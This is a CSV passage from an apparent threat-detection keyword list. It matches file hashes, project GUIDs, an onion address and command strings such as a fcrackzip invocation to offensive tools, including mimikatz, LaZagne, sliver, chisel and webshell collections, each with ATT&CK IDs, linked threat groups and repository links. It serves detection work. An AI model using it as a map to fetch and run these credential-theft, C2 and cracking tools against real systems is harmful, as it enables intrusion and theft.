"*fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95*",".{0,1000}fc77b7dc19250416baf67ae9f87e85ebad700032b0d437c0bc2176b2585fca95.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44569"
"*FC7A5B008FCF3AD0C3535D4463C094D6833F11AB21DD39616B93A5518FB1C316*",".{0,1000}FC7A5B008FCF3AD0C3535D4463C094D6833F11AB21DD39616B93A5518FB1C316.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44570"
"*fc828fc7ab13b12db0e3496a79c9af15f3f1391e5641551c0e0796ef6618bcf0*",".{0,1000}fc828fc7ab13b12db0e3496a79c9af15f3f1391e5641551c0e0796ef6618bcf0.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44573"
"*fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c*",".{0,1000}fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44575"
"*fc86f22cd93a4256749cc54df8e9d35efc8d6cd43e4bcc90c6ab212761975bb6*",".{0,1000}fc86f22cd93a4256749cc54df8e9d35efc8d6cd43e4bcc90c6ab212761975bb6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44576"
"*fc8a13a2f3a3a9d94a0b82c0a95fd6baced84cab1c0debfa7df2f3331dd3e31d*",".{0,1000}fc8a13a2f3a3a9d94a0b82c0a95fd6baced84cab1c0debfa7df2f3331dd3e31d.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","44577"
"*FC8F9DFC-3A81-4427-BFE5-DA11572EA8B5*",".{0,1000}FC8F9DFC\-3A81\-4427\-BFE5\-DA11572EA8B5.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","44578"
"*FC94F7F1F60026351DF16E3F9681E37BAA7491694DD7C5EA2CBE4B4F62602963*",".{0,1000}FC94F7F1F60026351DF16E3F9681E37BAA7491694DD7C5EA2CBE4B4F62602963.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","44580"
"*fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a*",".{0,1000}fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44581"
"*fc97c521e6bd003e20bd27d2de03f954e9f557167a015bcbe3322b60542fca4e*",".{0,1000}fc97c521e6bd003e20bd27d2de03f954e9f557167a015bcbe3322b60542fca4e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44582"
"*fc9b3605369431a13dff28fc6bd80351199281ac59b536902db537132cb69ab5*",".{0,1000}fc9b3605369431a13dff28fc6bd80351199281ac59b536902db537132cb69ab5.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","44585"
"*fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7*",".{0,1000}fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44586"
"*fc9db4d8355ff19b09feb69b73f4c551a1e11158abaf795b16081b24f56b321a*",".{0,1000}fc9db4d8355ff19b09feb69b73f4c551a1e11158abaf795b16081b24f56b321a.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44587"
"*fcb2f607771f185531790722ac8e3a924146186bbd3d9e03a7a793545772bdf2*",".{0,1000}fcb2f607771f185531790722ac8e3a924146186bbd3d9e03a7a793545772bdf2.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#filehash","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","44592"
"*fcb65ec936e24fb138b4d40c7223331de958b67c7e7a0a5177ec2d34ba342e6d*",".{0,1000}fcb65ec936e24fb138b4d40c7223331de958b67c7e7a0a5177ec2d34ba342e6d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44594"
"*fcba4c2c8de3766ac07bbdb3933257cf8d374a956c2b9f95cdcc7cc6e12e8423*",".{0,1000}fcba4c2c8de3766ac07bbdb3933257cf8d374a956c2b9f95cdcc7cc6e12e8423.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44598"
"*fcba85845f29fb731817fc013242bc410b18ea1e1cb3ff4ba52b599043f4e2d7*",".{0,1000}fcba85845f29fb731817fc013242bc410b18ea1e1cb3ff4ba52b599043f4e2d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44599"
"*fcbcac521d37905835cbe924d2bca822513682a9cfa0d48945673e5b72d86709*",".{0,1000}fcbcac521d37905835cbe924d2bca822513682a9cfa0d48945673e5b72d86709.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","#filehash","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","44600"
"*fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac*",".{0,1000}fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44601"
"*fcd4c0133b296c3590588114f203cd6506d60462590d115f942a3e123f472808*",".{0,1000}fcd4c0133b296c3590588114f203cd6506d60462590d115f942a3e123f472808.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","44604"
"*FCD5E13D-1663-4226-8280-1C6A97933AB7*",".{0,1000}FCD5E13D\-1663\-4226\-8280\-1C6A97933AB7.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","#GUIDproject","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","44605"
"*fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc*",".{0,1000}fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","#filehash","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","44606"
"*FCE55626-886B-4D3B-B7AA-92CECDA91514*",".{0,1000}FCE55626\-886B\-4D3B\-B7AA\-92CECDA91514.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","44609"
"*fce5693b62c0e3c49ba53a75354e6e9d99e44ba285faae08b25a1c220f471c7c*",".{0,1000}fce5693b62c0e3c49ba53a75354e6e9d99e44ba285faae08b25a1c220f471c7c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44610"
"*FCE81BDA-ACAC-4892-969E-0414E765593B*",".{0,1000}FCE81BDA\-ACAC\-4892\-969E\-0414E765593B.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","#GUIDproject","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","44612"
"*fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c*",".{0,1000}fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44613"
"*fcf42661023c6669ed49ee885c76f3edd3b04dedd6e1489d06aa2595c5ae60cc*",".{0,1000}fcf42661023c6669ed49ee885c76f3edd3b04dedd6e1489d06aa2595c5ae60cc.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#filehash","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","44614"
"*fcf4797042105ca349abdecb9d724dfcbb92300ff3d0881d90c311cb35fd5338*",".{0,1000}fcf4797042105ca349abdecb9d724dfcbb92300ff3d0881d90c311cb35fd5338.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44615"
"*fcf965a77c9f97dcd7304a7abbe6af09c3e41855c888db2acebfc995365d1a28*",".{0,1000}fcf965a77c9f97dcd7304a7abbe6af09c3e41855c888db2acebfc995365d1a28.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44616"
"*fcjam663uvgid2xbar24kab2vt4hjzsn6o77glh35jscuo567b2mnyqd.onion*",".{0,1000}fcjam663uvgid2xbar24kab2vt4hjzsn6o77glh35jscuo567b2mnyqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","44618"
"*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","44619"
"*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","44620"
"*fcrackzip -u -v -D -p *.zip*",".{0,1000}fcrackzip\s\-u\s\-v\s\-D\s\-p\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44621"
"*fd02da9d1f33b20c564f42fe23e92810e74485879a0257ba9c01643ebe38e623*",".{0,1000}fd02da9d1f33b20c564f42fe23e92810e74485879a0257ba9c01643ebe38e623.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44622"
"*fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e*",".{0,1000}fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44623"
"*fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e*",".{0,1000}fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","44624"
"*fd0b9f09770685ed6f40ecabcd31bc467fa22801164b52fdc638334009b7c06f*",".{0,1000}fd0b9f09770685ed6f40ecabcd31bc467fa22801164b52fdc638334009b7c06f.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","44626"
"*fd0c892807df56578a3beb415d800c765873ed72ab256f5cffdb5cccd086fd27*",".{0,1000}fd0c892807df56578a3beb415d800c765873ed72ab256f5cffdb5cccd086fd27.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","44627"
"*fd0d7ca03da27a8a9994e2d7238f864fe4bba8a1fe714e9f2fd9817368f7ff89*",".{0,1000}fd0d7ca03da27a8a9994e2d7238f864fe4bba8a1fe714e9f2fd9817368f7ff89.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44628"
"*fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85*",".{0,1000}fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44630"
"*fd1daf2fee0474c801fa389ad01576a42931f519ed59727388de4674c4643fc5*",".{0,1000}fd1daf2fee0474c801fa389ad01576a42931f519ed59727388de4674c4643fc5.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","44632"
"*fd2199463d699a530ca73f52434a033fcbcbd7b79b44b078a8461ad8dbdea36f*",".{0,1000}fd2199463d699a530ca73f52434a033fcbcbd7b79b44b078a8461ad8dbdea36f.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44633"
"*fd228d94224c9daa219509f1f2ef6b365b070ebcf0f7337df5655a9d58fcc6d2*",".{0,1000}fd228d94224c9daa219509f1f2ef6b365b070ebcf0f7337df5655a9d58fcc6d2.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","44634"
"*fd36746c68cdf7b32e63adaaa7b3e863b9769582f703722b88d9bf0b94030434*",".{0,1000}fd36746c68cdf7b32e63adaaa7b3e863b9769582f703722b88d9bf0b94030434.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","44638"
"*fd3bc4e3109f3d449cd27068c2b2600b852dbd2e35a67819d6a811b51027650d*",".{0,1000}fd3bc4e3109f3d449cd27068c2b2600b852dbd2e35a67819d6a811b51027650d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44640"
"*fd46836c80290243763470fd731ff29e0190fe91c23284aebafc31bbdca041b6*",".{0,1000}fd46836c80290243763470fd731ff29e0190fe91c23284aebafc31bbdca041b6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44641"
